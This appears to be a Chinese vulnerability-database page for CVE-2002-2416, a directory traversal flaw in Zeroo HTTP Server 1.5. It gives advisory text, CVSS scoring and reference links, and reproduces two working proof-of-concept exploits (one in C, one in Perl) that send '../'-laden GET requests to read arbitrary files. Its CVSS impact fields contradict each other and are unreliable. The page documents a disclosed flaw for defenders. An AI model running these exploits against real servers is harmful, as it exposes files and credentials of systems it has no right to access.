CVE-2002-2416
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:33:10
NMCOE    

[原文]Directory traversal vulnerability in Zeroo web server 1.5 allows remote attackers to read arbitrary files via a .. (dot dot) in a URL GET request.


[CNNVD]Zeroo HTTP Server远程目录遍历漏洞(CNNVD-200212-188)

        
        Zeroo HTTP Server是一款简单快速的WEB服务器程序。
        Zeroo HTTP对用户提交的恶意WEB请求缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限查看系统上任意文件内容。
        由于Zeroo不正确过滤WEB请求,攻击者可以提交包含多个'../'的WEB请求给Zeroo服务程序,可绕过WEB ROOT目录的限制,以WEB权限查看系统上任意文件内容。造成敏感信息泄露。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2416
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2416
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-188
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6308
(UNKNOWN)  BID  6308
http://www.iss.net/security_center/static/10672.php
(UNKNOWN)  XF  zeroo-dotdot-directory-traversal(10672)
http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00306.html
(UNKNOWN)  BUGTRAQ  20021122 Zeroo Folder Traversal Vulnerability
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0083.html
(UNKNOWN)  VULNWATCH  20021121 Zeroo Folder Traversal Vulnerability

- 漏洞信息

Zeroo HTTP Server远程目录遍历漏洞
中危 输入验证
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        Zeroo HTTP Server是一款简单快速的WEB服务器程序。
        Zeroo HTTP对用户提交的恶意WEB请求缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限查看系统上任意文件内容。
        由于Zeroo不正确过滤WEB请求,攻击者可以提交包含多个'../'的WEB请求给Zeroo服务程序,可绕过WEB ROOT目录的限制,以WEB权限查看系统上任意文件内容。造成敏感信息泄露。
        

- 公告与补丁

        厂商补丁:
        Zeroo
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://lonerunner.cfxweb.net/

- 漏洞信息 (22063)

Zeroo HTTP Server 1.5 Directory Traversal Vulnerability (1) (EDBID:22063)
linux remote
2002-11-22 Verified
0 mikecc
N/A [点击下载]
source: http://www.securityfocus.com/bid/6308/info

It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root.

An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any web server readable files from outside of the web root directory.

/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 *      hehe, just a copy and paste from my other directory
 *      traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;
        int amt;
        char * host;
        char * file;
        short port;
        char expstr[1024];
        int x;
        char * baz;

        printf("UC-zeroo\n");
        printf("zeroo httpd remote exploit\n");
        printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
        if (argc != 5)
        {
                printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n",argv[0]);
                return 0;
        }
        host = argv[1];
        port = atoi(argv[2]);
        file = argv[3];
	        amt = atoi(argv[4]);
        if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("sock() failed.\n");
                return 0;
        }
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
        printf("Connecting...\n");
        if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("Failed to connect to %s.\n",host);
                return 0;
        }
        printf("Setting up exploit string..\n");
        if ((amt + 8 + strlen(file)) > 1024)
        {
                printf("Error. Limit 1024 characters.\n");
                return 0;
        }
        sprintf(expstr,"GET /");
        for (x = 0; x < amt; x++)
        {
                strcat(expstr,FOO);
        }
        printf("\tInserting file string..\n");
        strcat(expstr,file);
        strcat(expstr,"\n\n");
        printf("Sending exploit string...\n");
        write(sd,expstr,strlen(expstr));
        get(sd);
        close(sd);
        return 0;
}

void get(int sd)
{
        char buf[1024];
        int x;
        fd_set rset;

        FD_ZERO(&rset);
        while (1)
        {
                FD_SET(sd,&rset);
                select(sd+1,&rset,0,0,0);
                if (FD_ISSET(sd,&rset))
                {
                        if ((x = read(sd,buf,1024)) == 0)
                        {
                                printf("Connection closed by foreign host.\n");
                                exit(1);
                        }
                        buf[x] = 0; /* clean out junk */
                        printf("%s\n",buf);
                }
        }
}
		

- 漏洞信息 (22064)

Zeroo HTTP Server 1.5 Directory Traversal Vulnerability (2) (EDBID:22064)
linux remote
2002-11-22 Verified
0 mattmurphy
N/A [点击下载]
source: http://www.securityfocus.com/bid/6308/info
 
It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root.
 
An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any web server readable files from outside of the web root directory.

#!/usr/bin/perl
use IO::Socket;
$pkt = "GET /../../../../../../../../../../../../../../../../../../../../%s
HTTP/1.0\r\n\r\n";
if (@ARGV < 2 || @ARGV > 3) {
print STDOUT "Usage: perl $0 [filename] [host] [port=80]";
exit;
}
if (@ARGV==3) {
$port=$ARGV[2];
} else {
$port=80;
}
$f = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$ARGV[1],PeerPort=>$port);
if (!defined($f)) {
$err=sprintf("Cannot connect to %s on port %d",$ARGV[1],$port);
print STDOUT $err;
exit;
}
$f->autoflush(1);
print $f $pkt;
while (defined($line = <$f>)) {
print STDOUT $line;
}
undef $f;		

- 漏洞信息

59170
Zeroo Web Server URI Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-11-21 Unknow
2002-11-21 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站